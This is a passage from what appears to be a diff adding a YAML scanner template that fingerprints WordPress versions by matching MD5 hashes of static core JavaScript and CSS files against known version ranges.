"(\"20f9f27717e6b1fd22576cdffba06336\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"000059450d81178e0ea9fea810f81859\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"64fab611a72d919d3f73c771ef15445e\" == 
md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e3f82f1cef1efcf97ce21ec854195081\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"29af1d5f15655bad729af42e58aca3f2\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"c2c48681543e79a94bb97052b2515b8e\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"916c9db27339c1ca756653466e82cb9c\" == md5(body))" + - type: dsl + name: 3.5.2 + dsl: + - "(\"1cde26c3ff2b26db1728fa937ca3cf2c\" == md5(body))" + - type: dsl + name: 3.5.1 + dsl: + - "(\"e4097e9dea685c3e613e0fc015ba2832\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"2609026f9412e8040a9b968ac127a1aa\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"af1d6c3eb0ea441600d4a7f2ac4c7c4e\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"67730ca56853b59e34256a21239276ba\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a7a21c718bcad2219b689aff5f3069ce\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"93a84034566188cba3829bf2c5f086e1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview.js" + matchers: + - type: dsl + name: 4.7.4 - 4.8.15 + dsl: + - "(\"619e58942a49b70e1490e19deab325f6\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"d40869ecf7e2a8f99bf2ec2d69f6e0b5\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"206c000a3d0c598ec471af58684f43e1\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"34a3ec49d6414125c613e87f9a51cf20\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7baba5f606cab24916f7802fd55f2d12\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"25d989447d4cc2930eddf46626aea1d3\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"359d13f4402b1f1d7262e891a46aa636\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"eead944332db05e2cdde148dac2cdabe\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + 
dsl: + - "(\"bc3602ceb3e5a0f05391eb77f48e3155\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"e313328820b62adfcf516062ab6567b4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c05d582d250523e033d471c335f32381\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1db4cfab7e31dd1f8b3f168e83fc4eb8\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"9100940268231265441eeec70eaad488\" == md5(body))" + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"617d9fd858e117c7d1d087be168b5643\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"da36bc2dfcb13350c799b62de68dfa4b\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"8ac9f2b666eaa82f047005ba79834f95\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"ed68f9b2b0bc3518687aeb93d4d53950\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ad995d60abf1b0d82d04f731122eed20\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"33510e09fd219d40e18f7fd9a7540d08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install-rtl.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"9c9f28632838146ea5b1f9de9ac289c8\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"654ac0a0f7a8fe1cd84c0c945b70af0f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"8d0d5ced4b04e74ebc2d0d330076e9b9\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"271de0780b4ce277539b2029932acd9c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"fc3897e410c67fa0f71e13e0fedc0f0c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"2a0fc0a9434d3aa6abfda715dfe80ca2\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"93340ac2d020159c171ae87c9d0a941b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a8124966cbc8794feb6b9fa52b3b9e76\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - 
"(\"806e003025b3092f2f9eb3026c6d9d38\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"04328c1f971f271dc3618a71a0eee27d\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"2120500e18667adf1d9d5204b08879da\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"39eb6cb46f5071727c143ba407b54b53\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"ef923f64828b48c0c6f03a0e42d780b2\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"ab9e254c14787712db65e61d2be6bef7\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"e2c347529384aff550838b13367792a6\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"77b94469c0536617ccf3f128e82629e7\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"3382df7e6ea38b249a7c9e71c72a56e0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"91030e73958b4b1f38ba18dcc85e478d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"3a0184e0737960ae80af99115327cdb5\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"fb9481431bd943229c998da48760401d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"76d54c1d7bb4bfbca21d7cec56708a88\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"266c2a68e3ef53c32e87cb86c5167105\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"dda20db0fea7db4eecf55cbcb7aeadda\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"de4f642413c45617556688cb66f92878\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"6ee14a47645d8869019f211aac8fb097\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1af620877ea34337ec3a558b1f504c2a\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"36cbcbb2f625bb726dfccd3f5b47f253\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - 
"(\"eae90901cd1d4841b2c9df2c26b0a8f7\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"73f3d17b335427a254e49fcddc51149c\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"e608364cb27dcf58e94433c8c3f02518\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"8bdcfc3e4a5a6d512e326df5947cf442\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"b8b5f897d9f7a0a3202d16da58fa8567\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"8f66eb91bd871ee5a1b4e03ba3c18e84\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"3f4eb897c1d10baf088c14dfc1808a22\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"d31c9c63282d58d5a4261f6b7a249f78\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"5b3e602359d9f830634371082916a862\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"7d522c5a28db08bc68c0a215899010a7\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"b8d0d2f9218cfb35658d15d11715ca6c\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"dee21a1f544d4781bece558fb6a34ce8\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"b46b7cbc7a3548d8bb28a9ae0b08ed9d\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"1453c4441307c2cc637c67710b527e7f\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"0f1c45aeab591060112ce9ff3f7f4ace\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/plugin.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.9.1 + dsl: + - "(\"61b5d1b6099e3e36cc2f73e400cf349c\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"00d304cfb272ef4addbbcb4812c73f98\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"4afced1f9ab8700e47f31367be6fe7f5\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.5 + dsl: + - "(\"9a65c6f6979ef70401b0b919b02e83ec\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - 
"(\"8d578828e03173241c2f2981a78e8d76\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"c402c0d9c448c922371f09f5e8c5acc6\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.9 + dsl: + - "(\"73b51b5aa71eb16b933a02283e871064\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.2 + dsl: + - "(\"3693e7d995a7dfbcc6ed8f89aac15f9c\" == md5(body))" + - type: dsl + name: 4.5.10 - 4.5.23 + dsl: + - "(\"0d7894abf7d8addd7139fd53e7d51899\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"5039db87abba4481d89e74ec591a761d\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.10 + dsl: + - "(\"0f5e81397f59120b9f53ae708251a7f0\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.4.24 + dsl: + - "(\"b0b7e2fa90ea37cd9de0489d978d56e2\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.11 + dsl: + - "(\"30d7bde04e460530a72425ee649a16d5\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"dcb6abd9b5957b73706088680f9151d9\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"6f2e2cba06ccf7e1106d1de79b66ae8b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ba2e2243e1870cd1623ed1de4bf95ccb\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"57fc7a21d1df2c4cbc4fb06dd43bdcc6\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"eaf98980a6aa955c848ea2a4688ee878\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"573ccd13990bffbf99e2273deb5b50dd\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.7 + dsl: + - "(\"a2995d1a4e10bf66e1d0a36b6b449424\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"69dd2736db6e8634bbe44998046c1ec9\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"587d485725001ad69b66564ad7f92067\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9fe35a0b1b7b33a545272a5c8d3710b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/wordpress.css" + matchers: + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - 
"(\"7097362cbcf848901a3b2b4403727b74\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"022939487eda7816036ece64e3cc176f\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"de8865129c6b495bd7472a1a2ba96808\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"225b39da6816d0a7a7f1549ec128dff4\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"aa4cb8f641f50e9d33fa6213b7fe7bc9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/global.dev.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"72e8801cc89a0b98141fc2dee9b873c6\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"d3cc587676f09f7e6ae73e6c8e7137b7\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"ab6285553bc272a086b545590d80cc22\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"ea3b8db0abda3026ddbd397d7d8adc84\" == md5(body))" + - type: dsl + name: 2.9.1 - 2.9.2 + dsl: + - "(\"7d6811856205875c098621001f4f698f\" == md5(body))" + - type: dsl + name: 2.9 + dsl: + - "(\"636fbecad6d5bd4bb3e4311c3a272877\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/global-rtl.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"e62b1a3cc3693dfb1dbc9f3c99ee3ee2\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"615061f4d085863ef4eaf0b89eccb59c\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"1cd613c5e84869f94e5cb5d44f0493ec\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"0005cc03539e4c0be4bdbc8cf12ba22d\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"639432085f54f73cc7857d5e6b3fdb22\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9079a3999a5f5d3d9114380cb0d6628d\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"31b484efa9c7aeaeda48c8dd305ed455\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"9dcfffe3f2b12122ab451bc0c48df2ae\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/css/wp-admin.dev.css" + matchers: + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"af5f37a886c348054b2fb21bb2c70c7c\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"5c6176761fc0ee644e210b33ba20357f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d83a0ec5116bd51468027455caf3c36d\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"c8b8a4d72181369d2714002093e91c48\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"e55e5834423d22b753bc5f27fd90ba4a\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f242d39c06919885462ee55861b9a859\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"2d11b980a3db81f466f9129a9a642c2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-controls.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"4be2481e0d8960e317486394c2e5186f\" == md5(body))" + - type: dsl + name: 3.4.1 + dsl: + - "(\"f518a6c4b341dcad34ca7f5145485923\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"170885b4ee7eb66ed4220332d4b3e370\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/wp-admin-rtl.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"06dd9aaea22ad8c13722470196c5aab4\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"92b1d910730c03ead0d0113d7cd01fbb\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"f77e30fb3963f31a628ad369fc71ad37\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"a6d4e8c9cf807f9aa705a886020d93f6\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"c68975fa2fc16fd96051530fb230668c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"030caf3660328d0bb366809887d33a2a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"081731ce01b46738e7adef8298ce8317\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"4c2bbf4f1b085d161cd0b9ec95d962a5\" == md5(body))" + - type: dsl + 
name: 3.9.1 - 3.9.33 + dsl: + - "(\"f702228e2b2b7d81ea2d68bcf94b94da\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"4fcf0cc06914368854e8d3956d67701d\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"c1c470fd221acba9da73357892b3fed0\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"dc555dec7552e1b6da150c8ffeba9d72\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"990c061c85fc81736b9c6befac3b5c77\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"738cb6605cfba84eb49b8e5fe88e897f\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"f9c6007ccbff118e5f77a60127c9121c\" == md5(body))" + - type: dsl + name: 4.9 - 5.1.8 + dsl: + - "(\"9ff8672a8c72aecf01e6efa72daf2458\" == md5(body))" + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"47835135274559ad6fe230b67dc65fc7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"a86bc93cbddb1a2b44fb30a46f66a8ad\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"164c87f2a9052670f8342f871a4fadaf\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3beeca0b321ae3e5e4502bbb6553808f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"26942f6cfb2da2970477af44cd17938f\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"d4656da83c9bd1b862f7e067b50cefed\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f146885900f710c867cd48f030851e97\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"dfb747b363e0d019c519b7a8bada6efc\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"143f424d05b81aafe90c22c8f757f53a\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"43fff36c3953279f711afdf374644dbd\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"17aae68019209c421bfa960a427905e2\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - 
"(\"47052b31a7383be79e9c16ea0d12bead\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"9202d951edc7a3584b9f90263e11f848\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"88e9ab4f522932e1726bddd3b9f6b0e7\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a16fb470df8691314021ea5e1535bf4e\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"fa1da7e900dbf5d150ddf026932c8cea\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"16321544efb636c26f9578140bbebb33\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"eaaffde6b37f2fb30f3b145f5f57456d\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"7ec70092bf4310607125f6817678fd81\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"886e4191f990f81168d9d9e7c842ca6a\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"b4c57417333b659979469a7c496d5da2\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"1c73f84ad8fd0062cc75aab6c925d8c2\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"73b84824902a6efc5d892277c4dba147\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"d14c437109488e390fc93c58296bfe6a\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"89a31ff1d9f17d001504866e9a20eebd\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"300482d04f7035050c8221a2388fa20b\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a082154a8dde56295f325f37ccea73b9\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"5960f69e0ed72d7a00e9bceaa55c9901\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"783d7663a8f6d63af0f1502d604e0883\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"273623256ba39ea22d7706e94fa7a706\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - 
"(\"8f78f0b82394df926411c9792070e6b8\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"2790a6d6a5f4ea3a417ba3223c8992e0\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"381abc41a9cbc190de2ef74a2e393b06\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"e406fa32c549ac964de8735631008aeb\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"9749243b24b6b8a96b3661f6af94577d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"71b5cb01bf11fbaea25876fb7226d560\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"96949ed7e435e3134e76a76c6c3a80d7\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"a91497ffc613caca5993b2f26d57fd95\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"f42ee6c5e96683c1aabf77c479a07457\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"d36964cc0fb79c59bfbbcdab333155cb\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"d71af8e409639e4fe29a82b2583e97ee\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"74bbd59ce4185f4b61f493f25badfb85\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"eee93d5b9b96842ce7aa67ba2c1c1acd\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"02f855357080d85d6d2f74e1358f198f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"928b4ce8221ec290c1b8f8cf863783a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"dd6a35718c9902530d588cdaee69e8ea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/plugin.js" + matchers: + - type: dsl + name: 4.8.2 - 4.9.1 + dsl: + - "(\"09a85c3689413e0ae8c2c36c71cb18b8\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"2db90f4a6e2b24a6ce1dc7cf5a4e665d\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"006614e9b8bc45c0c876a438ba68924b\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.5 + dsl: + - 
"(\"5bd6d9dcdfa64309a4f474e3c103c87d\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"da6af7852e021c05095cfba81d84c3df\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"ec62f800c56ed23f98f1fce2f3d72e00\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.9 + dsl: + - "(\"3a3f7240ce8e984494c7f0038465b840\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.2 + dsl: + - "(\"c45c771577fb74eb5ee89ccfa8568554\" == md5(body))" + - type: dsl + name: 4.5.10 - 4.5.23 + dsl: + - "(\"ea8c761e49d51c34f97a568827466f50\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"809bc21a5b35c1e60d107c830bff9474\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.10 + dsl: + - "(\"dc7c82e98849fd4bfac3646dd2adb837\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.4.24 + dsl: + - "(\"b2caced58fa8561c815adf6ec2de1093\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.11 + dsl: + - "(\"1cfe476c543e87f1bf2ad3ac091dc920\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"03d191b53b73ee6f989291dfa7a97050\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"4e3f972530a74ecdd1cb522418db3cb3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9bd4ce60a27b57efbabe5569270c770b\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"bd119f2c6e5eaca98303aedbd95d067f\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"c72fe4f61b17d1730183c6c5d3086faa\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"60cff85a34f1cf5ad273abe018e82252\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.7 + dsl: + - "(\"13a70cb0ee2bc1c745056c543f394b54\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"5691e4edf58967ac68ef2a739339159d\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"a057a76f743909bce2a9e2f43b888e22\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f7ac80df36bf6cb0554f61441bf6519d\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/js/link.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"1c8675dcd035cfb374f67bfcbf117a8c\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"2ec8b32828bdd9f0d9efeff41bfe801e\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"573fdbc34e8d60090cd5f5290a677078\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"03ef1e8b6d8670cd60cae80839934c69\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.1 + dsl: + - "(\"4bd8e57afec65d9648c6f3c2e9a9d3ab\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"5e28120ca92eab35105b7e939fca9330\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"c4a2322a9fd0b704a2c78e090d402011\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"c6f9330320b00237858bc6422a49aaf8\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"3c05b86e8eff05cd86141aeab299d69f\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"78783e24b2fd8857004c9c7a179896be\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"6adead36e8e401d6a079f15a564a1b09\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"2e6be97ee352add00ecf8f7d20174fc8\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"385f34c03f7abf693be8551979ea9106\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/wp-admin-rtl.css" + matchers: + - type: dsl + name: 4.3 - 5.1.8 + dsl: + - "(\"74f9dcf5ab8c92f6666ff52c699873c8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7fbe22c3651b774033fa758ca07ccbbb\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - 